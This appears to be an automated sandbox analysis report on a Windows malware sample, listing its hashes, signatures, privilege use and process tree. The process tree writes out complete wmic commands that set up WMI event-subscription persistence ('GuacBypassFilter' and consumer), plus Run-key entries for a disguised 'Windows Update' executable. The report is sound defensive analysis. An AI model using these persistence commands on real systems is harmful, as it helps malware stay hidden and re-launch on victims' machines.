Analysis
max time kernel: 146s
max time network: 158s
platform: windows10_x64
resource: win10v20210408
submitted: 18-06-2021 07:27
Static task: static1
Behavioral task: behavioral1
  Sample: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
  Resource: win10v20210408
General
Target: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
Size: 3.1MB
MD5: 14471a353788bb6cdb6071d0e0a83004
SHA1: c90b5c534ce0d622547bc5b96075eb3d4212d660
SHA256: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349
SHA512: 57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8
Malware Config
Signatures

Executes dropped EXE (1 IoC)
Processes: updater10.exe
  pid   Process
  2340  updater10.exe

Processes:
  resource                                       yara_rule
  behavioral2/files/0x000200000001ab40-116.dat   upx
  behavioral2/files/0x000200000001ab40-117.dat   upx

Deletes itself (1 IoC)
Processes: updater10.exe
  pid   Process
  2340  updater10.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: updater10.exe
  description      ioc                                                                                                                                                                                                Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "\"C:\\Users\\Admin\\AppData\\Local\\Windows Update\\updater10.exe\" -0 -0"                                      updater10.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "\"C:\\Users\\Admin\\AppData\\Local\\Windows Update\\updater10.exe\" -0 -0"  updater10.exe

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  7     api.ipify.org
  8     api.ipify.org

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: wmic.exe, WMIC.exe
  description                             pid   Process
  Token: SeIncreaseQuotaPrivilege         4060  wmic.exe
  Token: SeSecurityPrivilege              4060  wmic.exe
  Token: SeTakeOwnershipPrivilege         4060  wmic.exe
  Token: SeLoadDriverPrivilege            4060  wmic.exe
  Token: SeSystemProfilePrivilege         4060  wmic.exe
  Token: SeSystemtimePrivilege            4060  wmic.exe
  Token: SeProfSingleProcessPrivilege     4060  wmic.exe
  Token: SeIncBasePriorityPrivilege       4060  wmic.exe
  Token: SeCreatePagefilePrivilege        4060  wmic.exe
  Token: SeBackupPrivilege                4060  wmic.exe
  Token: SeRestorePrivilege               4060  wmic.exe
  Token: SeShutdownPrivilege              4060  wmic.exe
  Token: SeDebugPrivilege                 4060  wmic.exe
  Token: SeSystemEnvironmentPrivilege     4060  wmic.exe
  Token: SeRemoteShutdownPrivilege        4060  wmic.exe
  Token: SeUndockPrivilege                4060  wmic.exe
  Token: SeManageVolumePrivilege          4060  wmic.exe
  Token: 33                               4060  wmic.exe
  Token: 34                               4060  wmic.exe
  Token: 35                               4060  wmic.exe
  Token: 36                               4060  wmic.exe
  Token: SeIncreaseQuotaPrivilege         4060  wmic.exe
  Token: SeSecurityPrivilege              4060  wmic.exe
  Token: SeTakeOwnershipPrivilege         4060  wmic.exe
  Token: SeLoadDriverPrivilege            4060  wmic.exe
  Token: SeSystemProfilePrivilege         4060  wmic.exe
  Token: SeSystemtimePrivilege            4060  wmic.exe
  Token: SeProfSingleProcessPrivilege     4060  wmic.exe
  Token: SeIncBasePriorityPrivilege       4060  wmic.exe
  Token: SeCreatePagefilePrivilege        4060  wmic.exe
  Token: SeBackupPrivilege                4060  wmic.exe
  Token: SeRestorePrivilege               4060  wmic.exe
  Token: SeShutdownPrivilege              4060  wmic.exe
  Token: SeDebugPrivilege                 4060  wmic.exe
  Token: SeSystemEnvironmentPrivilege     4060  wmic.exe
  Token: SeRemoteShutdownPrivilege        4060  wmic.exe
  Token: SeUndockPrivilege                4060  wmic.exe
  Token: SeManageVolumePrivilege          4060  wmic.exe
  Token: 33                               4060  wmic.exe
  Token: 34                               4060  wmic.exe
  Token: 35                               4060  wmic.exe
  Token: 36                               4060  wmic.exe
  Token: SeIncreaseQuotaPrivilege         4040  WMIC.exe
  Token: SeSecurityPrivilege              4040  WMIC.exe
  Token: SeTakeOwnershipPrivilege         4040  WMIC.exe
  Token: SeLoadDriverPrivilege            4040  WMIC.exe
  Token: SeSystemProfilePrivilege         4040  WMIC.exe
  Token: SeSystemtimePrivilege            4040  WMIC.exe
  Token: SeProfSingleProcessPrivilege     4040  WMIC.exe
  Token: SeIncBasePriorityPrivilege       4040  WMIC.exe
  Token: SeCreatePagefilePrivilege        4040  WMIC.exe
  Token: SeBackupPrivilege                4040  WMIC.exe
  Token: SeRestorePrivilege               4040  WMIC.exe
  Token: SeShutdownPrivilege              4040  WMIC.exe
  Token: SeDebugPrivilege                 4040  WMIC.exe
  Token: SeSystemEnvironmentPrivilege     4040  WMIC.exe
  Token: SeRemoteShutdownPrivilege        4040  WMIC.exe
  Token: SeUndockPrivilege                4040  WMIC.exe
  Token: SeManageVolumePrivilege          4040  WMIC.exe
  Token: 33                               4040  WMIC.exe
  Token: 34                               4040  WMIC.exe
  Token: 35                               4040  WMIC.exe
  Token: 36                               4040  WMIC.exe
  Token: SeIncreaseQuotaPrivilege         4040  WMIC.exe

Suspicious use of WriteProcessMemory (26 IoCs)
Processes: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe, cmd.exe, updater10.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
  description                          pid   Process                                                                   procid_target
  PID 620 wrote to memory of 1484      620   c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe     72
  PID 620 wrote to memory of 1484      620   c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe     72
  PID 1484 wrote to memory of 2340     1484  cmd.exe                                                                   74
  PID 1484 wrote to memory of 2340     1484  cmd.exe                                                                   74
  PID 2340 wrote to memory of 4060     2340  updater10.exe                                                             80
  PID 2340 wrote to memory of 4060     2340  updater10.exe                                                             80
  PID 2340 wrote to memory of 3684     2340  updater10.exe                                                             83
  PID 2340 wrote to memory of 3684     2340  updater10.exe                                                             83
  PID 2340 wrote to memory of 2104     2340  updater10.exe                                                             85
  PID 2340 wrote to memory of 2104     2340  updater10.exe                                                             85
  PID 2104 wrote to memory of 4040     2104  cmd.exe                                                                   87
  PID 2104 wrote to memory of 4040     2104  cmd.exe                                                                   87
  PID 2340 wrote to memory of 636      2340  updater10.exe                                                             88
  PID 2340 wrote to memory of 636      2340  updater10.exe                                                             88
  PID 636 wrote to memory of 1484      636   cmd.exe                                                                   90
  PID 636 wrote to memory of 1484      636   cmd.exe                                                                   90
  PID 2340 wrote to memory of 2268     2340  updater10.exe                                                             91
  PID 2340 wrote to memory of 2268     2340  updater10.exe                                                             91
  PID 2268 wrote to memory of 3784     2268  cmd.exe                                                                   93
  PID 2268 wrote to memory of 3784     2268  cmd.exe                                                                   93
  PID 2340 wrote to memory of 1872     2340  updater10.exe                                                             94
  PID 2340 wrote to memory of 1872     2340  updater10.exe                                                             94
  PID 2340 wrote to memory of 1804     2340  updater10.exe                                                             96
  PID 2340 wrote to memory of 1804     2340  updater10.exe                                                             96
  PID 1804 wrote to memory of 4060     1804  cmd.exe                                                                   98
  PID 1804 wrote to memory of 4060     1804  cmd.exe                                                                   98
Processes
(indentation shows the parent/child relationship; the level number is the depth in the process tree)

Level 1: C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe"
  - Suspicious use of WriteProcessMemory
  PID: 620

  Level 2: C:\Windows\system32\cmd.exe
    Command line: cmd /C start "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
    - Suspicious use of WriteProcessMemory
    PID: 1484

    Level 3: C:\Users\Admin\AppData\Local\Windows Update\updater10.exe
      Command line: "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
      - Executes dropped EXE
      - Deletes itself
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      PID: 2340

      Level 4: C:\Windows\System32\Wbem\wmic.exe
        Command line: wmic process get Caption,ParentProcessId,ProcessId
        - Suspicious use of AdjustPrivilegeToken
        PID: 4060

      Level 4: C:\Windows\System32\cmd.exe
        Command line: C:\Windows\System32\cmd.exe ver
        PID: 3684

      Level 4: C:\Windows\system32\cmd.exe
        Command line: cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
        - Suspicious use of WriteProcessMemory
        PID: 2104

        Level 5: C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
          - Suspicious use of AdjustPrivilegeToken
          PID: 4040

      Level 4: C:\Windows\system32\cmd.exe
        Command line: cmd /C "wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'"
        - Suspicious use of WriteProcessMemory
        PID: 636

        Level 5: C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'
          PID: 1484

      Level 4: C:\Windows\system32\cmd.exe
        Command line: cmd /C "wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')"
        - Suspicious use of WriteProcessMemory
        PID: 2268

        Level 5: C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')
          PID: 3784

      Level 4: C:\Windows\System32\Wbem\wmic.exe
        Command line: wmic process get Caption,ParentProcessId,ProcessId
        PID: 1872

      Level 4: C:\Windows\system32\cmd.exe
        Command line: cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
        - Suspicious use of WriteProcessMemory
        PID: 1804

        Level 5: C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
          PID: 4060
Network
MITRE ATT&CK Enterprise v6
Downloads
MD5: 14471a353788bb6cdb6071d0e0a83004
SHA1: c90b5c534ce0d622547bc5b96075eb3d4212d660
SHA256: c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349
SHA512: 57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8